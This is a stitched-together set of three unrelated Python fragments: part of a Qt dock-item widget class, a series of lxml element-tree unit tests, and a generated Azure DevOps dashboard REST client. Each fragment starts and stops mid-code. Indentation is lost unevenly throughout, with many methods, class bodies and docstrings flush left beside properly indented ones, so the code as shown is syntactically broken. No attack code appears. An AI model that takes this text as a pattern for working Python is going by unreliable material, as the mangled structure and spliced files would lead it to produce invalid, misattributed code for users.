        This method should not be used and returns a constant value.
        """
        return 0
    def itemAt(self, idx):
        """ A virtual method implementation which returns None.
        """
        return None
    def takeAt(self, idx):
        """ A virtual method implementation which does nothing.
        """
        return None
class QDockItem(QFrame):
""" A QFrame subclass which acts as an item QDockArea.
"""
#: A signal emitted when the maximize button is clicked. This
#: signal is proxied from the current dock item title bar.
maximizeButtonClicked = Signal(bool)
#: A signal emitted when the restore button is clicked. This
#: signal is proxied from the current dock item title bar.
restoreButtonClicked = Signal(bool)
#: A signal emitted when the close button is clicked. This
#: signal is proxied from the current dock item title bar.
closeButtonClicked = Signal(bool)
#: A signal emitted when the link button is toggled. This
#: signal is proxied from the current dock item title bar.
linkButtonToggled = Signal(bool)
#: A signal emitted when the pin button is toggled. This
#: signal is proxied from the current dock item title bar.
pinButtonToggled = Signal(bool)
#: A signal emitted when the title is edited by the user. This
#: signal is proxied from the current dock item title bar.
titleEdited = Signal(unicode)
#: A signal emitted when the empty area is left double clicked.
#: This signal is proxied from the current dock item title bar.
titleBarLeftDoubleClicked = Signal(QPoint)
#: A signal emitted when the empty area is right clicked. This
#: signal is proxied from the current dock item title bar.
titleBarRightClicked = Signal(QPoint)
#: A signal emitted when the item is alerted. The payload is the
#: new alert level. An empty string indicates no alert.
alerted = Signal(unicode)
    def __init__(self, parent=None):
        """ Initialize a QDockItem.

        Parameters
        ----------
        parent : QWidget, optional
            The parent of the dock item.
        """
        super(QDockItem, self).__init__(parent)
        layout = QDockItemLayout()
        layout.setContentsMargins(0, 0, 0, 0)
        layout.setSizeConstraint(QLayout.SetMinAndMaxSize)
        self.setLayout(layout)
        self.setTitleBarWidget(QDockTitleBar())
        self.alerted.connect(self._onAlerted)
        self._manager = None  # Set and cleared by the DockManager
        self._alert_data = None   # _AlertData for an active alert, if any — TODO confirm lifecycle in alert API
        self._vis_changed = None  # pending visibility-change state; presumably consumed by _postVisibilityChange — verify
        self._closable = True     # gates whether closeEvent() accepts a close request
        self._closing = False     # True only while close() runs; suppresses hideEvent's visibility post
#--------------------------------------------------------------------------
# Reimplementations
#--------------------------------------------------------------------------
def close(self):
""" Handle the close request for the dock item.
"""
self._closing = True
try:
super(QDockItem, self).close()
finally:
self._closing = False
def closeEvent(self, event):
""" Handle the close event for the dock item.
This handler will reject the event if the item is not closable.
"""
event.ignore()
if self._closable:
event.accept()
area = self.rootDockArea()
if area is not None and area.dockEventsEnabled():
event = QDockItemEvent(DockItemClosed, self.objectName())
QApplication.postEvent(area, event)
    def showEvent(self, event):
        """ Handle the show event for the container.

        This handler posts a visibility change event.

        Parameters
        ----------
        event : QShowEvent
            The show event passed by Qt.
        """
        super(QDockItem, self).showEvent(event)
        self._postVisibilityChange(True)
    def hideEvent(self, event):
        """ Handle the hide event for the container.

        This handler posts a visibility change event.

        Parameters
        ----------
        event : QHideEvent
            The hide event passed by Qt.
        """
        super(QDockItem, self).hideEvent(event)
        # Don't post when closing; A closed event is posted instead.
        # (`_closing` is set only for the duration of close().)
        if not self._closing:
            self._postVisibilityChange(False)
    def mousePressEvent(self, event):
        """ Handle the mouse press event for the dock item.

        This handler will clear any alert level on a left click.

        Parameters
        ----------
        event : QMouseEvent
            The mouse press event passed by Qt.
        """
        if event.button() == Qt.LeftButton:
            self.clearAlert()
        super(QDockItem, self).mousePressEvent(event)
#--------------------------------------------------------------------------
# Public API
#--------------------------------------------------------------------------
    def manager(self):
        """ Get the dock manager for this dock item.

        The underlying attribute is assigned and cleared externally by
        the DockManager itself.

        Returns
        -------
        result : DockManager or None
            The dock manager which is managing this item.
        """
        return self._manager
def rootDockArea(self):
""" Get the root dock area for this dock item.
Returns
-------
result : QDockArea or None
The root dock area for this dock item.
"""
manager = self._manager
if manager is not None:
return manager.dock_area()
    def title(self):
        """ Get the title for the dock item.

        The value is delegated to the current title bar widget.

        Returns
        -------
        result : unicode
            The unicode title for the dock item.
        """
        return self.titleBarWidget().title()
def setTitle(self, title):
""" Set the title for the dock item.
Parameters
----------
title : unicode
The unicode title to use for | |
self.etree.PI
root = Element('root')
pi = PI('TARGET', 'TEXT')
pi.tail = "TAIL"
self.assertEqual(_bytes('<root></root>'),
self._writeElement(root))
root.addnext(pi)
self.assertEqual(_bytes('<root></root>\n<?TARGET TEXT?>'),
self._writeElement(root))
def test_addnext_comment(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
Comment = self.etree.Comment
root = Element('root')
SubElement(root, 'a')
comment = Comment('TEXT ')
comment.tail = "TAIL"
self.assertEqual(_bytes('<root><a></a></root>'),
self._writeElement(root))
root[0].addnext(comment)
self.assertEqual(_bytes('<root><a></a><!--TEXT -->TAIL</root>'),
self._writeElement(root))
def test_addnext_root_comment(self):
Element = self.etree.Element
Comment = self.etree.Comment
root = Element('root')
comment = Comment('TEXT ')
comment.tail = "TAIL"
self.assertEqual(_bytes('<root></root>'),
self._writeElement(root))
root.addnext(comment)
self.assertEqual(_bytes('<root></root>\n<!--TEXT -->'),
self._writeElement(root))
def test_addprevious_comment(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
Comment = self.etree.Comment
root = Element('root')
SubElement(root, 'a')
comment = Comment('TEXT ')
comment.tail = "TAIL"
self.assertEqual(_bytes('<root><a></a></root>'),
self._writeElement(root))
root[0].addprevious(comment)
self.assertEqual(_bytes('<root><!--TEXT -->TAIL<a></a></root>'),
self._writeElement(root))
def test_addprevious_root_comment(self):
Element = self.etree.Element
Comment = self.etree.Comment
root = Element('root')
comment = Comment('TEXT ')
comment.tail = "TAIL"
self.assertEqual(_bytes('<root></root>'),
self._writeElement(root))
root.addprevious(comment)
self.assertEqual(_bytes('<!--TEXT -->\n<root></root>'),
self._writeElement(root))
# ET's Elements have items() and key(), but not values()
def test_attribute_values(self):
XML = self.etree.XML
root = XML(_bytes('<doc alpha="Alpha" beta="Beta" gamma="Gamma"/>'))
values = root.values()
values.sort()
self.assertEqual(['Alpha', 'Beta', 'Gamma'], values)
# gives error in ElementTree
def test_comment_empty(self):
Element = self.etree.Element
Comment = self.etree.Comment
a = Element('a')
a.append(Comment())
self.assertEqual(
_bytes('<a><!----></a>'),
self._writeElement(a))
# ElementTree ignores comments
def test_comment_parse_empty(self):
ElementTree = self.etree.ElementTree
tostring = self.etree.tostring
xml = _bytes('<a><b/><!----><c/></a>')
f = BytesIO(xml)
doc = ElementTree(file=f)
a = doc.getroot()
self.assertEqual(
'',
a[1].text)
self.assertEqual(
xml,
tostring(a))
# ElementTree ignores comments
def test_comment_no_proxy_yet(self):
ElementTree = self.etree.ElementTree
f = BytesIO('<a><b></b><!-- hoi --><c></c></a>')
doc = ElementTree(file=f)
a = doc.getroot()
self.assertEqual(
' hoi ',
a[1].text)
# does not raise an exception in ElementTree
def test_comment_immutable(self):
Element = self.etree.Element
Comment = self.etree.Comment
c = Comment()
el = Element('myel')
self.assertRaises(TypeError, c.append, el)
self.assertRaises(TypeError, c.insert, 0, el)
self.assertRaises(TypeError, c.set, "myattr", "test")
def test_comment_immutable_attrib(self):
c = self.etree.Comment()
self.assertEqual(0, len(c.attrib))
self.assertFalse(c.attrib.__contains__('nope'))
self.assertFalse('nope' in c.attrib)
self.assertFalse('nope' in c.attrib.keys())
self.assertFalse('nope' in c.attrib.values())
self.assertFalse(('nope', 'huhu') in c.attrib.items())
self.assertEqual([], list(c.attrib))
self.assertEqual([], list(c.attrib.keys()))
self.assertEqual([], list(c.attrib.items()))
self.assertEqual([], list(c.attrib.values()))
self.assertEqual([], list(c.attrib.iterkeys()))
self.assertEqual([], list(c.attrib.iteritems()))
self.assertEqual([], list(c.attrib.itervalues()))
self.assertEqual('HUHU', c.attrib.pop('nope', 'HUHU'))
self.assertRaises(KeyError, c.attrib.pop, 'nope')
self.assertRaises(KeyError, c.attrib.__getitem__, 'only')
self.assertRaises(KeyError, c.attrib.__getitem__, 'names')
self.assertRaises(KeyError, c.attrib.__getitem__, 'nope')
self.assertRaises(KeyError, c.attrib.__setitem__, 'nope', 'yep')
self.assertRaises(KeyError, c.attrib.__delitem__, 'nope')
# test passing 'None' to dump()
    def test_dump_none(self):
        """dump() must raise TypeError when passed None."""
        self.assertRaises(TypeError, self.etree.dump, None)
def test_prefix(self):
ElementTree = self.etree.ElementTree
f = BytesIO('<a xmlns:foo="http://www.infrae.com/ns/1"><foo:b/></a>')
doc = ElementTree(file=f)
a = doc.getroot()
self.assertEqual(
None,
a.prefix)
self.assertEqual(
'foo',
a[0].prefix)
def test_prefix_default_ns(self):
ElementTree = self.etree.ElementTree
f = BytesIO('<a xmlns="http://www.infrae.com/ns/1"><b/></a>')
doc = ElementTree(file=f)
a = doc.getroot()
self.assertEqual(
None,
a.prefix)
self.assertEqual(
None,
a[0].prefix)
def test_getparent(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
self.assertEqual(
None,
a.getparent())
self.assertEqual(
a,
b.getparent())
self.assertEqual(
b.getparent(),
c.getparent())
self.assertEqual(
b,
d.getparent())
def test_iterchildren(self):
XML = self.etree.XML
root = XML(_bytes('<doc><one/><two>Two</two>Hm<three/></doc>'))
result = []
for el in root.iterchildren():
result.append(el.tag)
self.assertEqual(['one', 'two', 'three'], result)
def test_iterchildren_reversed(self):
XML = self.etree.XML
root = XML(_bytes('<doc><one/><two>Two</two>Hm<three/></doc>'))
result = []
for el in root.iterchildren(reversed=True):
result.append(el.tag)
self.assertEqual(['three', 'two', 'one'], result)
def test_iterchildren_tag(self):
XML = self.etree.XML
root = XML(_bytes('<doc><one/><two>Two</two>Hm<two>Bla</two></doc>'))
result = []
for el in root.iterchildren(tag='two'):
result.append(el.text)
self.assertEqual(['Two', 'Bla'], result)
def test_iterchildren_tag_posarg(self):
XML = self.etree.XML
root = XML(_bytes('<doc><one/><two>Two</two>Hm<two>Bla</two></doc>'))
result = []
for el in root.iterchildren('two'):
result.append(el.text)
self.assertEqual(['Two', 'Bla'], result)
def test_iterchildren_tag_reversed(self):
XML = self.etree.XML
root = XML(_bytes('<doc><one/><two>Two</two>Hm<two>Bla</two></doc>'))
result = []
for el in root.iterchildren(reversed=True, tag='two'):
result.append(el.text)
self.assertEqual(['Bla', 'Two'], result)
def test_iterchildren_tag_multiple(self):
XML = self.etree.XML
root = XML(_bytes('<doc><one/><two>Two</two>Hm<two>Bla</two><three/></doc>'))
result = []
for el in root.iterchildren(tag=['two', 'three']):
result.append(el.text)
self.assertEqual(['Two', 'Bla', None], result)
def test_iterchildren_tag_multiple_posarg(self):
XML = self.etree.XML
root = XML(_bytes('<doc><one/><two>Two</two>Hm<two>Bla</two><three/></doc>'))
result = []
for el in root.iterchildren('two', 'three'):
result.append(el.text)
self.assertEqual(['Two', 'Bla', None], result)
def test_iterchildren_tag_multiple_reversed(self):
XML = self.etree.XML
root = XML(_bytes('<doc><one/><two>Two</two>Hm<two>Bla</two><three/></doc>'))
result = []
for el in root.iterchildren(reversed=True, tag=['two', 'three']):
result.append(el.text)
self.assertEqual([None, 'Bla', 'Two'], result)
def test_iterancestors(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
self.assertEqual(
[],
list(a.iterancestors()))
self.assertEqual(
[a],
list(b.iterancestors()))
self.assertEqual(
[a],
list(c.iterancestors()))
self.assertEqual(
[b, a],
list(d.iterancestors()))
def test_iterancestors_tag(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
self.assertEqual(
[a],
list(d.iterancestors('a')))
self.assertEqual(
[a],
list(d.iterancestors(tag='a')))
self.assertEqual(
[b, a],
list(d.iterancestors('*')))
self.assertEqual(
[b, a],
list(d.iterancestors(tag='*')))
def test_iterancestors_tag_multiple(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
self.assertEqual(
[b, a],
list(d.iterancestors(tag=('a', 'b'))))
self.assertEqual(
[b, a],
list(d.iterancestors('a', 'b')))
self.assertEqual(
[],
list(d.iterancestors(tag=('w', 'x', 'y', 'z'))))
self.assertEqual(
[],
list(d.iterancestors('w', 'x', 'y', 'z')))
self.assertEqual(
[],
list(d.iterancestors(tag=('d', 'x'))))
self.assertEqual(
[],
list(d.iterancestors('d', 'x')))
self.assertEqual(
[b, a],
list(d.iterancestors(tag=('b', '*'))))
self.assertEqual(
[b, a],
list(d.iterancestors('b', '*')))
self.assertEqual(
[b],
list(d.iterancestors(tag=('b', 'c'))))
self.assertEqual(
[b],
list(d.iterancestors('b', 'c')))
def test_iterdescendants(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
e = SubElement(c, 'e')
self.assertEqual(
[b, d, c, e],
list(a.iterdescendants()))
self.assertEqual(
[],
list(d.iterdescendants()))
def test_iterdescendants_tag(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
e = SubElement(c, 'e')
self.assertEqual(
[],
list(a.iterdescendants('a')))
self.assertEqual(
[],
list(a.iterdescendants(tag='a')))
a2 = SubElement(e, 'a')
self.assertEqual(
[a2],
list(a.iterdescendants('a')))
self.assertEqual(
[a2],
list(c.iterdescendants('a')))
self.assertEqual(
[a2],
list(c.iterdescendants(tag='a')))
def test_iterdescendants_tag_multiple(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
e = SubElement(c, 'e')
self.assertEqual(
[b, e],
list(a.iterdescendants(tag=('a', 'b', 'e'))))
self.assertEqual(
[b, e],
list(a.iterdescendants('a', 'b', 'e')))
a2 = SubElement(e, 'a')
self.assertEqual(
[b, a2],
list(a.iterdescendants(tag=('a', 'b'))))
self.assertEqual(
[b, a2],
list(a.iterdescendants('a', 'b')))
self.assertEqual(
[],
list(c.iterdescendants(tag=('x', 'y', 'z'))))
self.assertEqual(
[],
list(c.iterdescendants('x', 'y', 'z')))
self.assertEqual(
[b, d, c, e, a2],
list(a.iterdescendants(tag=('x', 'y', 'z', '*'))))
self.assertEqual(
[b, d, c, e, a2],
list(a.iterdescendants('x', 'y', 'z', '*')))
def test_getroottree(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
self.assertEqual(
a,
a.getroottree().getroot())
self.assertEqual(
a,
b.getroottree().getroot())
self.assertEqual(
a,
d.getroottree().getroot())
def test_getnext(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
self.assertEqual(
None,
a.getnext())
self.assertEqual(
c,
b.getnext())
self.assertEqual(
None,
c.getnext())
def test_getprevious(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
self.assertEqual(
None,
a.getprevious())
self.assertEqual(
b,
c.getprevious())
self.assertEqual(
None,
b.getprevious())
def test_itersiblings(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
self.assertEqual(
[],
list(a.itersiblings()))
self.assertEqual(
[c],
list(b.itersiblings()))
self.assertEqual(
[],
list(c.itersiblings()))
self.assertEqual(
[b],
list(c.itersiblings(preceding=True)))
self.assertEqual(
[],
list(b.itersiblings(preceding=True)))
def test_itersiblings_tag(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
self.assertEqual(
[],
list(a.itersiblings(tag='XXX')))
self.assertEqual(
[c],
list(b.itersiblings(tag='c')))
self.assertEqual(
[c],
list(b.itersiblings(tag='*')))
self.assertEqual(
[b],
list(c.itersiblings(preceding=True, tag='b')))
self.assertEqual(
[],
list(c.itersiblings(preceding=True, tag='c')))
def test_itersiblings_tag_multiple(self):
Element = self.etree.Element
SubElement = self.etree.SubElement
a = Element('a')
b = SubElement(a, 'b')
c = SubElement(a, 'c')
d = SubElement(b, 'd')
e = SubElement(a, 'e')
self.assertEqual(
[],
list(a.itersiblings(tag=('XXX', 'YYY'))))
self.assertEqual(
[c, e],
list(b.itersiblings(tag=('c', 'd', 'e'))))
self.assertEqual(
[b],
list(c.itersiblings(preceding=True, tag=('b', 'b', 'c', 'd'))))
self.assertEqual(
[c, b],
list(e.itersiblings(preceding=True, tag=('c', '*'))))
    def test_parseid(self):
        """parseid() returns the parsed tree plus a dict of ID-typed attributes.

        The test expects only DTD-declared ID attributes ('myid', 'someid')
        and xml:id values to be collected — not the plain 'id' attribute.
        """
        parseid = self.etree.parseid
        XML = self.etree.XML
        xml_text = _bytes('''
        <!DOCTYPE document [
        <!ELEMENT document (h1,p)*>
        <!ELEMENT h1 (#PCDATA)>
        <!ATTLIST h1 myid ID #REQUIRED>
        <!ELEMENT p  (#PCDATA)>
        <!ATTLIST p  someid ID #REQUIRED>
        ]>
        <document>
          <h1 myid="chapter1">...</h1>
          <p id="note1" class="note">...</p>
          <p>Regular paragraph.</p>
          <p xml:id="xmlid">XML:ID paragraph.</p>
          <p someid="warn1" class="warning">...</p>
        </document>
        ''')
        tree, dic = parseid(BytesIO(xml_text))
        root = tree.getroot()
        root2 = XML(xml_text)
        self.assertEqual(self._writeElement(root),
                         self._writeElement(root2))
        expected = {
            "chapter1" : root[0],
            "xmlid"    : root[3],
            "warn1"    : root[4]
            }
        self.assertTrue("chapter1" in dic)
        self.assertTrue("warn1" in dic)
        self.assertTrue("xmlid" in dic)
        self._checkIDDict(dic, expected)
    def test_XMLDTDID(self):
        """XMLDTDID() returns the root element plus a dict of ID-typed attributes.

        Mirrors test_parseid, but parses from a string and returns the
        root directly instead of an ElementTree.
        """
        XMLDTDID = self.etree.XMLDTDID
        XML = self.etree.XML
        xml_text = _bytes('''
        <!DOCTYPE document [
        <!ELEMENT document (h1,p)*>
        <!ELEMENT h1 (#PCDATA)>
        <!ATTLIST h1 myid ID #REQUIRED>
        <!ELEMENT p  (#PCDATA)>
        <!ATTLIST p  someid ID #REQUIRED>
        ]>
        <document>
          <h1 myid="chapter1">...</h1>
          <p id="note1" class="note">...</p>
          <p>Regular paragraph.</p>
          <p xml:id="xmlid">XML:ID paragraph.</p>
          <p someid="warn1" class="warning">...</p>
        </document>
        ''')
        root, dic = XMLDTDID(xml_text)
        root2 = XML(xml_text)
        self.assertEqual(self._writeElement(root),
                         self._writeElement(root2))
        expected = {
            "chapter1" : root[0],
            "xmlid"    : root[3],
            "warn1"    : root[4]
            }
        self.assertTrue("chapter1" in dic)
        self.assertTrue("warn1" in dic)
        self.assertTrue("xmlid" in dic)
        self._checkIDDict(dic, expected)
def test_XMLDTDID_empty(self):
XMLDTDID = self.etree.XMLDTDID
XML = | |
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# Generated file, DO NOT EDIT
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------------------------
from msrest import Serializer, Deserializer
from ...client import Client
from . import models
class DashboardClient(Client):
"""Dashboard
:param str base_url: Service URL
:param Authentication creds: Authenticated credentials.
"""
    def __init__(self, base_url=None, creds=None):
        super(DashboardClient, self).__init__(base_url, creds)
        # Register every class from the generated models module so msrest
        # can (de)serialize the request and response payloads by name.
        client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
        self._serialize = Serializer(client_models)
        self._deserialize = Deserializer(client_models)
resource_area_identifier = '31c84e0a-3ece-48fd-a29d-100849af99ba'
    def create_dashboard(self, dashboard, team_context):
        """CreateDashboard.
        [Preview API] Create the supplied dashboard.
        :param :class:`<Dashboard> <azure.devops.v5_1.dashboard.models.Dashboard>` dashboard: The initial state of the dashboard
        :param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
        :rtype: :class:`<Dashboard> <azure.devops.v5_1.dashboard.models.Dashboard>`
        """
        project = None
        team = None
        if team_context is not None:
            # Explicit ids take precedence over names when resolving the
            # project and team route segments.
            if team_context.project_id:
                project = team_context.project_id
            else:
                project = team_context.project
            if team_context.team_id:
                team = team_context.team_id
            else:
                team = team_context.team
        route_values = {}
        # Only emit route segments that could be resolved.
        if project is not None:
            route_values['project'] = self._serialize.url('project', project, 'string')
        if team is not None:
            route_values['team'] = self._serialize.url('team', team, 'string')
        content = self._serialize.body(dashboard, 'Dashboard')
        response = self._send(http_method='POST',
                              location_id='454b3e51-2e6e-48d4-ad81-978154089351',
                              version='5.1-preview.2',
                              route_values=route_values,
                              content=content)
        return self._deserialize('Dashboard', response)
    def delete_dashboard(self, team_context, dashboard_id):
        """DeleteDashboard.
        [Preview API] Delete a dashboard given its ID. This also deletes the widgets associated with this dashboard.
        :param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
        :param str dashboard_id: ID of the dashboard to delete.
        """
        project = None
        team = None
        if team_context is not None:
            # Explicit ids take precedence over names when resolving the
            # project and team route segments.
            if team_context.project_id:
                project = team_context.project_id
            else:
                project = team_context.project
            if team_context.team_id:
                team = team_context.team_id
            else:
                team = team_context.team
        route_values = {}
        if project is not None:
            route_values['project'] = self._serialize.url('project', project, 'string')
        if team is not None:
            route_values['team'] = self._serialize.url('team', team, 'string')
        if dashboard_id is not None:
            route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
        # DELETE returns no body; nothing to deserialize.
        self._send(http_method='DELETE',
                   location_id='454b3e51-2e6e-48d4-ad81-978154089351',
                   version='5.1-preview.2',
                   route_values=route_values)
    def get_dashboard(self, team_context, dashboard_id):
        """GetDashboard.
        [Preview API] Get a dashboard by its ID.
        :param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
        :param str dashboard_id:
        :rtype: :class:`<Dashboard> <azure.devops.v5_1.dashboard.models.Dashboard>`
        """
        project = None
        team = None
        if team_context is not None:
            # Explicit ids take precedence over names when resolving the
            # project and team route segments.
            if team_context.project_id:
                project = team_context.project_id
            else:
                project = team_context.project
            if team_context.team_id:
                team = team_context.team_id
            else:
                team = team_context.team
        route_values = {}
        if project is not None:
            route_values['project'] = self._serialize.url('project', project, 'string')
        if team is not None:
            route_values['team'] = self._serialize.url('team', team, 'string')
        if dashboard_id is not None:
            route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
        response = self._send(http_method='GET',
                              location_id='454b3e51-2e6e-48d4-ad81-978154089351',
                              version='5.1-preview.2',
                              route_values=route_values)
        return self._deserialize('Dashboard', response)
    def get_dashboards(self, team_context):
        """GetDashboards.
        [Preview API] Get a list of dashboards.
        :param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
        :rtype: :class:`<DashboardGroup> <azure.devops.v5_1.dashboard.models.DashboardGroup>`
        """
        project = None
        team = None
        if team_context is not None:
            # Explicit ids take precedence over names when resolving the
            # project and team route segments.
            if team_context.project_id:
                project = team_context.project_id
            else:
                project = team_context.project
            if team_context.team_id:
                team = team_context.team_id
            else:
                team = team_context.team
        route_values = {}
        if project is not None:
            route_values['project'] = self._serialize.url('project', project, 'string')
        if team is not None:
            route_values['team'] = self._serialize.url('team', team, 'string')
        response = self._send(http_method='GET',
                              location_id='454b3e51-2e6e-48d4-ad81-978154089351',
                              version='5.1-preview.2',
                              route_values=route_values)
        return self._deserialize('DashboardGroup', response)
    def replace_dashboard(self, dashboard, team_context, dashboard_id):
        """ReplaceDashboard.
        [Preview API] Replace configuration for the specified dashboard. Replaces Widget list on Dashboard, only if property is supplied.
        :param :class:`<Dashboard> <azure.devops.v5_1.dashboard.models.Dashboard>` dashboard: The Configuration of the dashboard to replace.
        :param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
        :param str dashboard_id: ID of the dashboard to replace.
        :rtype: :class:`<Dashboard> <azure.devops.v5_1.dashboard.models.Dashboard>`
        """
        project = None
        team = None
        if team_context is not None:
            # Explicit ids take precedence over names when resolving the
            # project and team route segments.
            if team_context.project_id:
                project = team_context.project_id
            else:
                project = team_context.project
            if team_context.team_id:
                team = team_context.team_id
            else:
                team = team_context.team
        route_values = {}
        if project is not None:
            route_values['project'] = self._serialize.url('project', project, 'string')
        if team is not None:
            route_values['team'] = self._serialize.url('team', team, 'string')
        if dashboard_id is not None:
            route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
        content = self._serialize.body(dashboard, 'Dashboard')
        response = self._send(http_method='PUT',
                              location_id='454b3e51-2e6e-48d4-ad81-978154089351',
                              version='5.1-preview.2',
                              route_values=route_values,
                              content=content)
        return self._deserialize('Dashboard', response)
    def replace_dashboards(self, group, team_context):
        """ReplaceDashboards.
        [Preview API] Update the name and position of dashboards in the supplied group, and remove omitted dashboards. Does not modify dashboard content.
        :param :class:`<DashboardGroup> <azure.devops.v5_1.dashboard.models.DashboardGroup>` group:
        :param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
        :rtype: :class:`<DashboardGroup> <azure.devops.v5_1.dashboard.models.DashboardGroup>`
        """
        project = None
        team = None
        if team_context is not None:
            # Explicit ids take precedence over names when resolving the
            # project and team route segments.
            if team_context.project_id:
                project = team_context.project_id
            else:
                project = team_context.project
            if team_context.team_id:
                team = team_context.team_id
            else:
                team = team_context.team
        route_values = {}
        if project is not None:
            route_values['project'] = self._serialize.url('project', project, 'string')
        if team is not None:
            route_values['team'] = self._serialize.url('team', team, 'string')
        content = self._serialize.body(group, 'DashboardGroup')
        response = self._send(http_method='PUT',
                              location_id='454b3e51-2e6e-48d4-ad81-978154089351',
                              version='5.1-preview.2',
                              route_values=route_values,
                              content=content)
        return self._deserialize('DashboardGroup', response)
def create_widget(self, widget, team_context, dashboard_id):
"""CreateWidget.
[Preview API] Create a widget on the specified dashboard.
:param :class:`<Widget> <azure.devops.v5_1.dashboard.models.Widget>` widget: State of the widget to add
:param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id: ID of dashboard the widget will be added to.
:rtype: :class:`<Widget> <azure.devops.v5_1.dashboard.models.Widget>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
content = self._serialize.body(widget, 'Widget')
response = self._send(http_method='POST',
location_id='bdcff53a-8355-4172-a00a-40497ea23afc',
version='5.1-preview.2',
route_values=route_values,
content=content)
return self._deserialize('Widget', response)
def delete_widget(self, team_context, dashboard_id, widget_id):
"""DeleteWidget.
[Preview API] Delete the specified widget.
:param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id: ID of the dashboard containing the widget.
:param str widget_id: ID of the widget to update.
:rtype: :class:`<Dashboard> <azure.devops.v5_1.dashboard.models.Dashboard>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
if widget_id is not None:
route_values['widgetId'] = self._serialize.url('widget_id', widget_id, 'str')
response = self._send(http_method='DELETE',
location_id='bdcff53a-8355-4172-a00a-40497ea23afc',
version='5.1-preview.2',
route_values=route_values)
return self._deserialize('Dashboard', response)
def get_widget(self, team_context, dashboard_id, widget_id):
"""GetWidget.
[Preview API] Get the current state of the specified widget.
:param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id: ID of the dashboard containing the widget.
:param str widget_id: ID of the widget to read.
:rtype: :class:`<Widget> <azure.devops.v5_1.dashboard.models.Widget>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
if widget_id is not None:
route_values['widgetId'] = self._serialize.url('widget_id', widget_id, 'str')
response = self._send(http_method='GET',
location_id='bdcff53a-8355-4172-a00a-40497ea23afc',
version='5.1-preview.2',
route_values=route_values)
return self._deserialize('Widget', response)
def get_widgets(self, team_context, dashboard_id, eTag=None):
"""GetWidgets.
[Preview API] Get widgets contained on the specified dashboard.
:param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
:param str dashboard_id: ID of the dashboard to read.
:param String eTag: Dashboard Widgets Version
